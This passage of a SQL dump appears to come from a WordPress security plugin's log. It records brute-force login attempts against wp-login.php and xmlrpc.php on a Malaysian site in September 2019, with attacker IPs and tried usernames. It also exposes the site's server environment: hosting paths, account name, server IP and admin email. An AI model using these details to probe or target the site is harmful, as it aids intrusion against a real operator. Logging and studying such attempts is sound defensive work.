20:03:34',17909672,19234240,'https://bintara.com.my/wp-login.php',1,0,'162.144.134.39'),(24248,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"33326\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-qlmShanGhHYaqyCS4@wAAABA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568664214.4986\";s:12:\"REQUEST_TIME\";s:10:\"1568664214\";}}','notice','2019-09-16 20:03:35','2019-09-16 20:03:34',17748152,19234240,'https://bintara.com.my/wp-login.php',1,0,'162.144.134.39'),(24247,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"164.160.128.100\";s:11:\"REMOTE_PORT\";s:5:\"47382\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-o4WShanGhHYaqyCS3PQAAABU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568663777.68\";s:12:\"REQUEST_TIME\";s:10:\"1568663777\";}}','notice','2019-09-16 19:56:19','2019-09-16 19:56:18',18260920,19560464,'https://bintara.com.my/xmlrpc.php',1,0,'164.160.128.100'),(24246,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"164.160.128.100\";s:11:\"REMOTE_PORT\";s:5:\"46200\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-o3bIp53uPsY7BKAq9cgAAAFY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568663773.3416\";s:12:\"REQUEST_TIME\";s:10:\"1568663773\";}}','notice','2019-09-16 19:56:15','2019-09-16 19:56:13',17742744,19232616,'https://bintara.com.my/wp-login.php',1,0,'164.160.128.100'),(24245,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"204.15.133.176\";s:11:\"REMOTE_PORT\";s:5:\"54340\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-n6A99C9j9bhK9Kpk2AgAAAQE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568663528.2886\";s:12:\"REQUEST_TIME\";s:10:\"1568663528\";}}','notice','2019-09-16 19:52:09','2019-09-16 19:52:08',18261336,19559344,'https://bintara.com.my/xmlrpc.php',1,0,'204.15.133.176'),(24244,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"204.15.133.176\";s:11:\"REMOTE_PORT\";s:5:\"53754\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-n5WShanGhHYaqyCS2LgAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568663525.578\";s:12:\"REQUEST_TIME\";s:10:\"1568663525\";}}','notice','2019-09-16 19:52:06','2019-09-16 19:52:05',17742608,19234272,'https://bintara.com.my/wp-login.php',1,0,'204.15.133.176'),(24243,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.95.126\";s:11:\"REMOTE_PORT\";s:5:\"54112\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-nEmShanGhHYaqyCS1QQAAAAk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568663314.1548\";s:12:\"REQUEST_TIME\";s:10:\"1568663314\";}}','notice','2019-09-16 19:48:35','2019-09-16 19:48:34',18259992,19556608,'https://bintara.com.my/xmlrpc.php',1,0,'149.202.95.126'),(24242,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.95.126\";s:11:\"REMOTE_PORT\";s:5:\"53532\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-nD9K-omY048@iBsMTLAAAAM4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568663311.5346\";s:12:\"REQUEST_TIME\";s:10:\"1568663311\";}}','notice','2019-09-16 19:48:32','2019-09-16 19:48:31',17740752,19232552,'https://bintara.com.my/wp-login.php',1,0,'149.202.95.126'),(24164,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"139.59.228.226\";s:11:\"REMOTE_PORT\";s:5:\"43188\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@jFXPgbK7GuRh1kKnjUwAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568645909.2326\";s:12:\"REQUEST_TIME\";s:10:\"1568645909\";}}','notice','2019-09-16 14:58:30','2019-09-16 14:58:29',17740112,19232352,'https://bintara.com.my/wp-login.php',1,0,'139.59.228.226'),(24165,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"139.59.228.226\";s:11:\"REMOTE_PORT\";s:5:\"43333\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@jFx0uvyt9KRYoKL8i0QAAAA8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568645911.2977\";s:12:\"REQUEST_TIME\";s:10:\"1568645911\";}}','notice','2019-09-16 14:58:32','2019-09-16 